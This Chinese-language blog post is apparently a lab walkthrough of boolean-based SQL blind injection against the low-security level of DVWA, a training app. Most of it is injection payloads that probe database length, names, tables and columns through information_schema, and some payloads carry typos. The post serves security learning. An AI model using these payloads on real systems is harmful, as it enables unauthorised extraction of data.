码迷,mamicode.com
首页 > 数据库 > 详细

DVWA-sql注入(盲注)

时间:2020-04-25 23:48:05      阅读:216      评论:0      收藏:0      [点我收藏+]

标签:图片   长度   and   ase   bst   sele   显示   sel   mat   

SQL注入分类

1.(以字符类型方式)

     ?数字型

     ?字符型

2.(以注入方式)

       ? 回显注入        < 回显正常、 回显报错注入>

       ? 盲注               <布尔盲注、  时间盲注  >

 

 

dvwa盲注模块 

低级别

输入5

技术图片

 

 

输入6

 

技术图片

 

 

输入  1 and  1=1 #  正确  1  and  1=2   #  正确

 

输入  1‘ and ‘1‘=‘1 #  正确   1’ and  ‘1‘=‘2 # 错误

 

说明 存在注入漏洞  且是字符型  得盲注

 

 

 

一、猜解数据库名

 

1‘ and lengeh(database()) > 3  # 正确

 

1‘ and lengeh(database()) > 4   # 错误

 

数据库长度是4 

输入1’ and length(database())=4 # ,显示存在:说明长度为4

 

技术图片

 

 

 

 

 

然后采用二分法猜解数据库的名字,可以用if函数,这里用的ASCII值,道理都是一样的:

1’ and ascii(substr(databse(),1,1))=100 #

技术图片

 

 

 第一个字母的ASCII值是100,也就是d,以此类推得出数据库名是dvwa。

 

二、 猜解表名:

1’ and (select count (table_name) from information_schema.tables where table_schema=database() )=2 #

技术图片

 

 

 说明有两个表。

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # 

显示存在,说明第一个表的长度是9.

技术图片

 

 

 

 

 

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103 #

显示存在,说明第一个字母是g。

再重复步骤猜解,即可猜解出两个表名(guestbook、users)。

 

 

三、猜解字段名:

猜解数量:1’ and (select count(column_name) from information_schema.columns where table_name= ’users’)=8 #

显示存在,说明一共8个字段。

然后再利用2分法猜解字段名和字段中数据。

 

 

 

 

基于时间的盲注:

 

 

技术图片

 

 技术图片

 

 

 

 

 

 

 

 

 

DVWA-sql注入(盲注)

标签:图片   长度   and   ase   bst   sele   显示   sel   mat   

原文地址:https://www.cnblogs.com/xingyuner/p/12775929.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!